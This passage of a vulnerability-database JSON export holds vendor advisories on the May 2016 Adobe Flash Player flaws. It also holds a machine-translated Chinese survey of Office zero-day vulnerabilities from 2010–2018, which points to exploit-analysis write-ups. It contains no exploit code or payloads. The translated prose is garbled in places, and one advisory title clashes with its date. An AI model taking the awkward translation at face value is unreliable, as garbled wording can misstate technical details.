"CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2016-05-12T00:00:00", "id": "ASA-201605-18", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000625.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:44:46", "description": "- CVE-2016-1096:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1097:\n\nUse-after-free. Wen Guanxing from Pangu LAB, working with the Chromium\nVulnerability Rewards Program .\n\n- CVE-2016-1098:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1099:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1100:\n\nMemory corruption. Wen Guanxing from Pangu LAB.\n\n- CVE-2016-1101:\n\nHeap buffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1102:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1103:\n\nBuffer overflow. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1104:\n\nMemory corruption. Mateusz Jurczyk and Natalie Silvanovich of Google\nProject Zero.\n\n- CVE-2016-1105:\n\nType confusion. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1106:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-1107:\n\nUse-after-free. NSFOCUS Security Team.\n\n- CVE-2016-1108:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1109:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-1110:\n\nUse-after-free. Nicolas Joly of Microsoft Vulnerability Research.\n\n- CVE-2016-4108:\n\nUse-after-free. Natalie Silvanovich of Google Project Zero.\n\n- CVE-2016-4109:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4110:\n\nUse-after-free. willJ of Tencent PC Manager.\n\n- CVE-2016-4111:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4112:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4113:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4114:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4115:\n\nMemory corruption. willJ of Tencent PC Manager.\n\n- CVE-2016-4116:\n\nVulnerability in the directory search path used to find resources.\nLadislav Baco of CSIRT.SK.\n\n- CVE-2016-4117:\n\nType confusion vulnerability that could lead to code execution. Genwei\nJiang of FireEye, Inc.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "archlinux", "title": "flashplugin: arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1100", "CVE-2016-1109", "CVE-2016-1107", "CVE-2016-1102", "CVE-2016-1098", "CVE-2016-4108", "CVE-2016-1097", "CVE-2016-1110", "CVE-2016-4109", "CVE-2016-4117", "CVE-2016-4116", "CVE-2016-1104", "CVE-2016-4114", "CVE-2016-1101", "CVE-2016-4113", "CVE-2016-4112", "CVE-2016-1106", "CVE-2016-4111", "CVE-2016-1108", "CVE-2016-1096", "CVE-2016-1103", "CVE-2016-4110", "CVE-2016-4115", "CVE-2016-1105", "CVE-2016-1099"], "modified": "2016-05-12T00:00:00", "id": "ASA-201605-16", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-May/000623.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mscve": [{"lastseen": "2021-12-06T18:25:26", "description": "This security update addresses the following vulnerabilities, which are described in Adobe Security Bulletin [APSB16-15](<http://helpx.adobe.com/security/products/flash-player/apsb16-15.html>):\n\nCVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-10T07:00:00", "type": "mscve", "title": "March 2016 Adobe Flash Security Update", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117"], "modified": "2017-05-17T07:00:00", "id": "MS:ADV160002", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV160002", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nAdobe reports:\n\nThese updates resolve type confusion vulnerabilities that could\n\t lead to code execution (CVE-2016-1105, CVE-2016-4117).\nThese updates resolve use-after-free vulnerabilities that could\n\t lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107,\n\t CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\n\t CVE-2016-4110, CVE-2016-4121).\nThese updates resolve a heap buffer overflow vulnerability that\n\t could lead to code execution (CVE-2016-1101).\nThese updates resolve a buffer overflow vulnerability that could\n\t lead to code execution (CVE-2016-1103).\nThese updates resolve memory corruption vulnerabilities that could\n\t lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099,\n\t CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\n\t CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\n\t CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161,\n\t CVE-2016-4162, CVE-2016-4163).\nThese updates resolve a vulnerability in the directory search path\n\t used to find resources that could lead to code execution\n\t (CVE-2016-4116).\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-12T00:00:00", "type": "freebsd", "title": "flash -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2016-05-12T00:00:00", "id": "0C6B008D-35C4-11E6-8E82-002590263BF5", "href": "https://vuxml.freebsd.org/freebsd/0c6b008d-35c4-11e6-8e82-002590263bf5.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-10-19T20:36:22", "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es):\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities, detailed in the Adobe Security Bulletin listed in the\nReferences section, could allow an attacker to create a specially crafted SWF\nfile that would cause flash-plugin to crash, execute arbitrary code, or disclose\nsensitive information when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104,\nCVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109,\nCVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111,\nCVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116,\nCVE-2016-4117)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-13T00:00:00", "type": "redhat", "title": "(RHSA-2016:1079) Critical: flash-plugin security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2018-06-07T05:04:30", "id": "RHSA-2016:1079", "href": "https://access.redhat.com/errata/RHSA-2016:1079", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 2, "cvss3": {}, "published": "2019-06-13T00:00:00", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "modified": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}